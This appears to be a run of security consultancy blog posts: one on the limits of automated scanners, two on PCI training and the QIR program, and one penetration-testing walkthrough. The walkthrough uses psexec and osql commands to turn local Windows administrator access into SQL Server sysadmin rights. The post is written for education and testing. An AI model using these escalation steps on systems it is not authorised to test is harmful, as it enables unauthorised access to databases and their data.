A False Sense of Security

I have worked for and with technology-focused companies for the past 15 years.  I’m a huge believer that technological advances (or even just new ways of using existing technology) are making our lives demonstrably better. There are stops and starts along the way, but as a society, we are using technology to improve our businesses and our lives. I truly believe this. But I also believe that we, at times, rely on ‘technology’ as our savior. It fixes all problems, it solves all puzzles. Everything that we don’t really understand (but have been forced to address either at work or in life) seems like it can be dealt with by some technical product. This view is supported by the fact that, in the world of IT at least, a technical product does exist for almost anything for which there is even the perception of a need. This is especially true when you are talking about a discipline like information security. Infrastructure design and configuration, application security, regulatory compliance, policy development, privacy, disaster recovery, database security, vendor management….all of these areas might fall under ‘information security’. At the very least, those in charge of information security have some input into all of these areas. There’s a lot to know, or at least understand, here and many professionals within our community are asked to overreach their personal knowledge bank on a daily basis in order to address a need of the business. Beyond the complexity of the required knowledge, there is also a well-understood desire for standardization and progress. This is especially true if you are working for large, politically complex organizations. If you are working with disparate groups or product/program managers that are under a lot of time-pressure and working with a defined budget, you want to present a ‘solution’ that is standardized, well-structured, easily understood, and represents progress for the security program. Even if it’s not everything that should be done. Ultimately, it may be more effective to get something in place that becomes an accepted practice, even if it’s not perfect.   I’ve been thinking quite a bit about this over the last couple of weeks. Several large organizations have recently come to NetSPI and asked us to re-assess environments and applications that were recently assessed as part of their standard internal process (which involved entirely automated tools and assessment-on-demand type services). They came to us because someone on the internal security team was concerned that they were falsely assuming all was well after ‘clean’ results from these expensive technology solutions. Sadly, we were not able to provide them with any assurance – in each case our team identified vulnerabilities that were critical in nature and provided administrator access to apparently ‘secure’ environments and applications. These vulnerabilities were not zero-day issues – in some cases they weren’t even hard to identify. In two instances, the technologies that were used in the solution being reviewed simply weren’t supported by the on-demand assessment service that was utilized as part of their internal process (not that our client was informed of this by the vendor). At the end of the day, the fully automated and on-demand assessment solutions just didn’t find critical issues that our clients needed to know about in order to reduce risk. My point in relating this information isn’t to bash the use of technology or automated solutions in assessing technical security. Automation is a key part in making security more efficient, and standardization helps to promote adoption and understanding internally – both good things. My point is to recognize that technology isn’t perfect and information security has characteristics that make putting all of your assessment ‘eggs’ in a single basket provided by an automation vendor a very risky proposition for an organization that is actually looking to manage risk and exposure effectively. A recent study (Performance of automated network vulnerability scanning at remediating security issues) that looked at the performance of automated network vulnerability scanners specifically found that, across the breadth of tools tested, only slightly more than half of the vulnerabilities known to exist in the test environment were identified (and remediation guidelines presented) by the tools tested in the study. (As a side note, the same study hits the tools pretty hard on the usefulness of the reporting that is generated – something that we’ve had issues with for years and why we created our own reporting structure and content as part of CorrelatedVM™.) An interesting quote in regard to vulnerability scanning with the automated tools: ‘…there are issues with the method: manual effort is needed to reach complete accuracy and the remediation guidelines are oftentimes very cumbersome to study.’ This certainly supports NetSPI’s approach and the methodology that we follow with clients. While this study was focused specifically on leading network vulnerability scanning tools, another study (Why Johnny Can’t Pentest:  An Analysis of Black-box Web Vulnerability Scanners) found a very similar situation with web vulnerability scanners. Apparently the researchers in this case found that while certain kinds of vulnerabilities are found quite effectively, ‘there are whole classes of vulnerabilities that are not well-understood and cannot be detected by any of the scanners.’ (their emphasis) My point in all of this is that automated vulnerability scanning is certainly useful and, with large environments or applications, absolutely necessary (we use some of these tools in our assessment process), but don’t be lulled into a false sense of security. If this is all that you are doing to identify and address potential vulnerabilities within your network or critical application environments then you have a problem. Alex Crittenden


SQL Server Local Authorization Bypass

Unlike previous versions, SQL Server 2008 and 2012 don’t provide local system administrators with database administrator rights by default. This was a great idea by Microsoft to reinforce the practices of least privilege and separation of duties. However, in spite of the fact that their heart was in the right place, it was implemented in such a way that any local administrator (or attacker) can bypass the restriction. In most environments SQL Server 2008 and 2012 are installed on domain member servers and access is managed via domain groups. As a penetration tester, that means once I obtain Domain Admin privileges I can simply add myself to the database admin groups in active directory to get access. Once in a while I run across an SQL Server instance that is not managed via domain group or is not on the domain at all. That’s when the escalation method covered in this blog can be useful.

Vulnerability Overview

When SQL Server 2008 is installed the “NT AUTHORITYSYSTEM” account and the SQL Server service account are added to the “sysadmin” fixed server role by default. The “sysadmin” fixed server role is essentially the database administrators group. Any account that has been assigned the role will have complete control over the SQL Server and the associated data. Local administrators can obtain “sysadmin” privileges in two easy steps:

  1. Use psexec to obtain a cmd.exe console running as “NTAUTHORITYSYSTEM”.
  2. Use osql and a trusted connection to connect the local database with “sysadmin” privileges.

In SQL Server 2012,  “NT AUTHORITYSYSTEM” no longer has sysadmin privileges by default, but this restriction can be overcome by migrating to the SQL Server service process.

Attack Walkthrough

For those of you who want to test out the attack at home you can follow the steps below.

  1. Install SQL Server 2008 Express. Click. Click. Click. It can be downloaded from Microsoft at
  2. Log into the Windows server as a local administrator that has not been assigned the “sysadmin” fixed server role.
  3. Run the following SQL query against the local server to check if the current user has been assigned the “sysadmin” fixed server role.osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)”The -E switch authenticates to the SQL Server as the current user and does not require a password. The –S switch specifies the SQL Server instance. The query “select is_srvrolemember(‘sysadmin’)” will return a 1 if you have been assigned the “sysadmin” fixed server role, and a 0 if you haven’t.

    Note: In some cases, the local administrator or local administrators group is added to the sysadmin group manually during the installation process. I don’t believe that’s what Microsoft intended, but it happens a lot none the less. If that’s the case, this escalation process will not be necessary.

  4. Download psexec. It’s part of the sysinternals tool set and can be downloaded from Microsoft at:
  5. Type the following command to obtain a “NT AUTHORITYSYSTEM” console with psexec:psexec –s cmd.exeNote: The -s switch tells psexec to run cmd.exe as “NT AUTHORITYSYSTEM” .  It does this by creating a new service and configuring it to run as “NT AUTHORITYSYSTEM”.
  6. Type the one of the following command to verify that you are running as “NT AUTHORITYSYSTEM”whoami
    echo %username%
  7. Now run the same osql query as before to verify that you have “sysadmin” privileges. This time you should get a 1 back instead of a 0.osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)”ss_sql_2008_blog_img2
  8. If you prefer a GUI tool you can also run management studio express as shown in the screenshots below.

Wrap Up

To stream line the process a little bit, I recently created a metasploit post module that will  escalate privileges and add a sysadmin to the target SQL server via an existing meterpreter session.  That module can be downloaded from my git hub account for those who are interested: In spite of how easy it is to use this method to gain unauthorized access to databases it appears to be a requirement in SQL Server 2008. At least one Microsoft article stated “Do not delete this account or remove it from the SYSADMIN fixed server role. The NTAUTHORITYSYSTEM account is used by Microsoft Update and by Microsoft SMS to apply service packs and hotfixes…”.  So in some cases this boils down to missing patching vs. excessive privileges from risk perspective. My guess is that most companies are going to want to keep their servers patched.  🙂  Regardless, hopefully this blog was informative and useful. As always, have fun, but hack responsibility.



PA-DSS vendors now have training options

During PA-DSS audits, NetSPI is often asked about what training options payment application vendors have for developers. These questions are in reference to PA-DSS requirement 5.2.a. This requirement states: Obtain and review software development processes for payment applications (internal and external, and including web-administrative access to product). Verify the process includes training in secure coding techniques for developers, based on industry best practices and guidance. The PCI-Council is working with SANS for a set of courses that PA-DSS vendors can use. These courses include fundamental courses for developers and security staff as well as development language specific courses. There are also courses for senior level developers, tester and managers.   An example of one of the courses is Secure Coding for PCI Compliance. This is a two-day course on the OWASP top ten issues and is for a developer with experience in one of the following languages: Perl, PHP, C, C++, Java or Ruby. If you are a payment application vendor needing to start of enhance your training, look at the SANS web site – These should help you get through requirement 5.2.a. Please note, NetSPI is not associated with SANS in any way.


Filling the Void – QIR Program

The PCI Council recently announced a new certification program called the Qualified Integrators and Resellers (QIR) Program. In my opinion this fills a gap that has existed for specific environments which typically reflects negatively on merchants or service providers that purchase off-the-shelf payment application solutions. Using a PA-DSS validated payment application is a requirement for merchants as is using it in a PCI-DSS compliant manner. However, the issue appears when resellers or integrators may not be fully aware of how their implementation plan and methods impact the merchant; the entity ultimately responsible for compliance. The issue then manifests during a QSA lead assessment when it is discovered that the system was not implemented properly per the Implementation Guide (segmentation efforts were negated, etc). As a QSA this is a hard conversation to have with my clients, especially since this usually means a non-compliant assessment and the merchant has to spend additional time or resources to resolve the issue. Now I understand that this certification program is not going to solve everything, but having integrators and resellers that are trained similar to PA-QSA’s and QSA’s just helps everyone involved in the process to be on the same playing field. This results with the merchants and service providers reaping the largest slice of Benefit Pie. Questions will come up whether this program will be worth it or if it is going to last since all indications lean towards this program being voluntary. While I get that the PCI Council’s official list of certified integrators and resellers may not be the first place the merchant or service providers go when selecting their next Point of Sale (POS) system (application features versus QIR certified reseller), they can insist that the POS vendor use QIR certified integrators, since in the end it is the merchant or service provider’s compliance status on the line. While still a little scarce since it has not been rolled out just yet, more information on the QIR Program can be found on the PCI Council’s QIR program site at The Council will also be having a webinar August 16 and again on August 29. Additional information can be found at the PCI Council’s Training Webinar page.

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.